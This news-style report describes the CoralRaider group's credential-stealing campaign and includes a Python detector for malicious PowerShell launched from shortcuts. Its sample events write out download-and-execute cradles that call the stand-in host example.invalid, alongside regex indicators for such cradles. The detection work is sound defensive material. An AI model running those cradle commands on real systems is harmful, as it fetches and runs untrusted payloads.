Vietnam-Based Hackers Launch Sophisticated Cyber Espionage Campaign Across Asia

CoralRaider Group Targets Financial Data in Multi-National Cyber Attack

A suspected Vietnamese-origin threat group tracked as CoralRaider has been identified by Cisco Talos researchers as the operator of a malware campaign that has run across several Asian and Southeast Asian countries since at least May 2023. The group’s primary objective appears to be the theft of financial data and credentials from businesses and individuals in India, China, South Korea, Bangladesh, Pakistan, Indonesia, and its home base, Vietnam.

Cisco Talos, Cisco’s threat intelligence and research group, has been tracking the CoralRaider cluster and assesses it as financially motivated. According to Talos researchers Chetan Raghuprasad and Joey Chen, CoralRaider’s toolset includes RotBot, a customized variant of the open-source Quasar RAT, and the XClient stealer. The group also relies on widely available commodity malware such as AsyncRAT, NetSupport RAT, and Rhadamanthys.

Of particular concern is the group’s focus on hijacking business and advertising accounts, using stealer families such as Ducktail, NodeStealer, and VietCredCare to take over those accounts and monetize them. The stolen data is then sold on underground markets.

CoralRaider’s operations are predominantly based in Vietnam, judging by the Vietnamese language used in its communication channels and embedded in its malware payloads. The attack chain typically begins with a Windows shortcut file (LNK) delivered to the victim, although the exact delivery method remains unclear.

Once the victim opens the shortcut, it launches PowerShell scripts designed to evade detection and to download and execute RotBot and XClient. These payloads harvest financial data, social media credentials, and browser cookies for platforms including Facebook, Instagram, TikTok, YouTube, Discord, and Telegram.
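The chain described above (a user-opened LNK that spawns PowerShell, which in turn fetches and runs the stealer) leaves a recognizable trace in process-creation telemetry: a PowerShell process whose parent is explorer.exe, started with a hidden window, a relaxed execution policy, and an encoded or inline download cradle. The following is an added example, not code from the article or from Cisco Talos, of detection logic that scores such events; the sample events are constructed for illustration, and the indicator patterns and threshold are the author's own assumptions rather than published indicators for this campaign.

```python
import base64
import re

# Indicator patterns for a PowerShell download cradle launched from a shortcut.
# These are illustrative assumptions, not IOCs published for CoralRaider.
INDICATORS = {
    "hidden_window":     re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "policy_bypass":     re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I),
    "encoded_command":   re.compile(r"-e(?:c|nc|ncodedcommand)?\b\s+[A-Za-z0-9+/=]{20,}", re.I),
    "download_cradle":   re.compile(r"(?:downloadstring|downloadfile|invoke-webrequest|\biwr\b|"
                                    r"net\.webclient|start-bitstransfer|invoke-restmethod|\birm\b)", re.I),
    "invoke_expression": re.compile(r"(?:\biex\b|invoke-expression)", re.I),
    "no_profile":        re.compile(r"-no(?:p|profile|ni|ninteractive)\b", re.I),
}

# -EncodedCommand carries base64 of a UTF-16LE string; decode it so the cradle
# inside is scanned as well as the outer command line.
ENC_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\b\s+([A-Za-z0-9+/=]{20,})", re.I)


def decode_encoded_command(cmd):
    """Return the decoded -EncodedCommand payload, or "" if none/undecodable."""
    m = ENC_RE.search(cmd)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def score_event(ev):
    """Score one process-creation event; returns (score, list of matched indicators)."""
    if not ev["image"].lower().endswith(("powershell.exe", "pwsh.exe")):
        return 0, []
    text = ev["cmd"] + "\n" + decode_encoded_command(ev["cmd"])
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    # A shortcut double-clicked by the user runs with explorer.exe as the parent.
    if ev["parent"].lower().endswith("explorer.exe"):
        hits.append("parent_explorer")
    return len(hits), hits


def find_suspicious(events, threshold=3):
    """Return (host, timestamp, score, hits) for every event at or above threshold."""
    out = []
    for ev in events:
        score, hits = score_event(ev)
        if score >= threshold:
            out.append((ev["host"], ev["ts"], score, hits))
    return out


# Constructed sample telemetry (hypothetical hosts, paths and URLs; not real data).
ENCODED_PAYLOAD = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"
    .encode("utf-16-le")).decode()

PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"ts": "2024-04-05T09:12:01Z", "host": "WS01", "image": r"C:\Windows\explorer.exe",
     "parent": r"C:\Windows\System32\userinit.exe", "cmd": "explorer.exe"},
    # Encoded cradle spawned from a shortcut: every indicator fires.
    {"ts": "2024-04-05T09:12:40Z", "host": "WS01", "image": PS_IMAGE,
     "parent": r"C:\Windows\explorer.exe",
     "cmd": "powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass "
            "-EncodedCommand " + ENCODED_PAYLOAD},
    # Plain-text cradle using short aliases.
    {"ts": "2024-04-05T10:03:17Z", "host": "WS02", "image": PS_IMAGE,
     "parent": r"C:\Windows\explorer.exe",
     "cmd": r'powershell.exe -w hidden -ep bypass -c "iwr http://example.invalid/x.bin '
            r'-OutFile $env:TEMP\x.exe; Start-Process $env:TEMP\x.exe"'},
    # Benign scheduled script run from cmd.exe: low score.
    {"ts": "2024-04-05T11:00:00Z", "host": "WS03", "image": PS_IMAGE,
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmd": r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"},
    # Interactive console opened by a user: parent explorer.exe alone is not enough.
    {"ts": "2024-04-05T11:05:42Z", "host": "WS03", "image": PS_IMAGE,
     "parent": r"C:\Windows\explorer.exe", "cmd": "powershell.exe"},
]

if __name__ == "__main__":
    for host, ts, score, hits in find_suspicious(SAMPLE_EVENTS):
        print(f"{ts} {host} score={score} {','.join(hits)}")
```

The parent-process check on its own is noisy (any user who opens a PowerShell console from the Start menu has explorer.exe as the parent), which is why it only contributes one point; the hidden window, policy bypass, and download cradle are what push a real stager over the threshold. Decoding -EncodedCommand matters because an encoded stager shows none of the cradle keywords on the raw command line.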

In a separate development, cybersecurity firm Bitdefender has uncovered a malvertising campaign on Facebook that trades on the popularity of generative AI tools to distribute information stealers including Rilide, Vidar, IceRAT, and Nova Stealer. The sponsored ads have been observed targeting European users.

As these campaigns show, stealers that target browser sessions and social media credentials remain a profitable business, and organizations and individuals alike need to keep their defenses against malicious shortcuts, sponsored-ad lures, and credential theft current.
